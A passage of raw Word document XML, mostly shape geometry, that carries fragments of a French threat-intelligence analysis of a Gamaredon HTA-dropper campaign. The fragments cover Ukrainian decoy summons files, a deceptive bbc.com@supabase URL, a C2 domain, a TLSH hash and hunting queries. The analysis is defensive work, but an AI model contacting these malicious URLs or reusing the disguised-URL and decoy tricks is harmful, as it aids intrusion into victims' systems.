                            <a:pt x="5760719" y="2138680"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2138680"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1863724"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="228600" y="1591944"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1591944"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1864359"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="228600" y="1864359"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="228600" y="1591944"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="228600" y="1320164"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1320164"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1592579"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="228600" y="1592579"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="228600" y="1320164"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="228600" y="877570"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="877570"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1320799"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="228600" y="1320799"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="228600" y="877570"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="429894"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="429894"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="877570"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="877570"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="429894"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="228600" y="158115"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="158115"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="430529"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="228600" y="430529"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="228600" y="158115"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="228600" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="158750"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="228600" y="158750"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="22860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1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8412489</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5790564" cy="523875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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523875">
                          <a:moveTo>
                            <a:pt x="3238499" y="523875"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5790564" y="52387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523875"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1276349" y="523875"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3237864" y="52387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1275715" y="523875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8936999</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5790564" cy="415924"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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4159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415924">
                          <a:moveTo>
                            <a:pt x="3238499" y="415924"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5790564" y="41592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415924"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1276349" y="415924"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3237864" y="41592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415924"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="415924"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1275715" y="41592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41592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361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7307579"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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73075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7307579">
                          <a:moveTo>
                            <a:pt x="0" y="6859904"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="6859904"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="7307579"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="7307579"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="6859904"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="6587489"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="6587489"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="6860539"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="6860539"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="6587489"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="5966459"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="5966459"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="6587489"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="6587489"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5966459"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="5347970"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="5347970"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="5966459"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5966459"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5347970"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="4380230"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="4380230"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="5347970"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5347970"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4380230"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="3937634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3937634"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="4380230"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4380230"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3937634"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="3482974"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3482974"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3938269"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3938269"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3482974"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="3028314"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3028314"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3483609"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3483609"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3028314"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="2580639"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2580639"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3028949"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3028949"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2580639"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="2138044"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2138044"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2580639"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2580639"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2138044"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1863724"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1863724"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2138680"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2138680"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1863724"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="228600" y="1591944"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1591944"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1864359"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="228600" y="1864359"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="228600" y="1591944"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="228600" y="1320164"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1320164"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1592579"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="228600" y="1592579"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="228600" y="1320164"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="228600" y="877570"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="877570"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1320799"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="228600" y="1320799"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="228600" y="877570"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="429894"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="429894"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="877570"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="877570"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="429894"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="228600" y="158115"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="158115"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="430529"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="228600" y="430529"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="228600" y="158115"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="228600" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="158750"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="228600" y="158750"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="22860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8412489</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5790564" cy="523875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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523875">
                          <a:moveTo>
                            <a:pt x="3238499" y="523875"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5790564" y="52387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523875"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1276349" y="523875"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3237864" y="52387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1275715" y="523875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7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8936999</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5790564" cy="415924"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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4159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415924">
                          <a:moveTo>
                            <a:pt x="3238499" y="415924"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5790564" y="41592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415924"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1276349" y="415924"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3237864" y="41592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415924"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="415924"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1275715" y="41592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41592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6144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8412489</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5797550" cy="947420"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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7550" cy="947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7550" h="947420">
                          <a:moveTo>
                            <a:pt x="3175" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3175" y="947420"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="944245"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5797550" y="944245"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="527685"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5791200" y="527685"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="3175"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="579755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7168" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2176779</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8418839</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="934720"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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9347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934720">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="93472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192" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4138929</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8418839</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="934720"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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9347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934720">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="93472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216" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6691630</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8412489</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="947420"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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947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947420">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="94742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26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9581524</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1828800" cy="6349"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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28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31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33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948560</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4036513" cy="158253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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651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name:"2_14_6_1033_09.12.2025.rar"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1220340</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5545832" cy="158253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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583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name:"2_14_6_1033_09.12.2025.rar" have:dropped_file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1504338</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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Ces requêtes ont permis d'identifier les composants associés à l'archive, notamment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7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1677693</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2216985" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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69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document leurre et un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 loader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HTA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8432" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5088813</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1940430</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="287473" cy="158253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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4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про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456" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3097809</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1940430</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1209493" cy="158253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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949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name:"Повістка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480" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6157798</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1940430</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="623820" cy="158253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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3820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виклик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150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1940430</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1186633" cy="158253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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663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52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2110610</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3472633" cy="158253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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63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підозрюваного_2_14_6_1033_09.12.2025.pdf"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55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2382390</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2611573" cy="158253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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15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name:capture.pdf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57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2654170</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4036513" cy="158253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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651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name:"2_14_6_1033_09.12.2025.HTA"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2938168</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3651133" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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11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L'analyse du code HTA a mis en évidence l'URL suivante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3200905</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5652512" cy="158253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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251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content:"www.bbc.com@iiwdsxwamylbwwsoyrmj.supabase.co/functions/v1/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3371085</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4981952" cy="158253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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195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clever-responder/GurGoogle_09.12.2025/audience/capture.pdf"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8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3655083</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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L'exploration de l’historique a également permis d'identifier une autre ressource associée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9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3828438</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1502267" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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226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 même infrastructure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4097285</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5403107" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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310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http://iiwdsxwamylbwwsoyrmj.supabase.co/functions/v1/clever-responder/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1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4273815</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1722850" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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KokonGoogle_09.12.2025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4555120</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5834898" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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Une recherche de similarité sur l'archive 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1_13_5_1691_09.12.2025.rar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à l'aide de TLSH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4737758</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2709415" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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94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n'a retourné aucun autre résultat pertinent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5000495</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4143752" cy="158253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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375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tlsh:96:ZSAPdjKJZr1SseD5ukbq7QYKzugbViDuxbr7J2uH/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5170675</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3975553" cy="158253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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555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k9f+s0ruOl9/0HKu+:hPdjKJZBSs6PNtADubr1xH/4Gso2C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5454673</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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</w:rPr>
                          <w:t xml:space="preserve">La campagne a ensuite été corrélée avec la règle publique Nextron suivante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5628028</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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MAL_APT_Gamaredon_HTA_Dropper_Dec25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25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. Cette règle confirme l'attribution de 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5801383</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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échantillons à l'écosystème Gamaredon et fournit des éléments supplémentaires de pivoting.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5974738</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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 revanche, au vu du nombre conséquent d’échantillons associés, il n’a pas été possible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6148093</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2487990" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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79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tous les analyser dans le temps imparti.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6423048</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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recherche basée sur les communications réseau observées a permis d'identifier d'autres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6596403</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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échantillons</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08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utilisant</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08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même</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08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infrastructure</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08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Supabase</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="2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6756905</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5149592" cy="158253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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959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behavior_network:*supabase.co/functions/v1/clever-responder/*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7040903</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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L'analyse des résultats a montré que la convention de nommage des fichiers HTA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7214258</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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particulièrement stable. Les noms suivent généralement un format contenant plusieurs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7387613</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5736155" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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615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identifiants numériques suivis d'une date. Cette observation a conduit à la requête suivante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7650350</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3724093" cy="158253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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2409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name:*06.2026.HTA ls:2026-01-01+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9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7934348</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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Cette recherche a permis d'identifier un ensemble important d'échantillons récents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0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8107703</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1937293" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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72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partageant la même structure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1200" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1178559</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8423933</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="796173" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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1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2224" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2669540</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8510293</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1013084" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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3248" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5020310</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8510293</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="827142" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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71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C2 contacté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4272" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1275715</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8597288</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="563668" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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6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29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8942335</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1876240" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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ScanDocuments_version_PD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8942335</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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e9d61edc0a774cd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34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8942335</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2335853" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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https://thepolicies.dpdns.org/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3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9118865</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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d4e9c659a0058c1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39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9118865</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1876240" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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F_AdobeReader_CreaterEdi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41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9118865</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1032592" cy="163574"/>
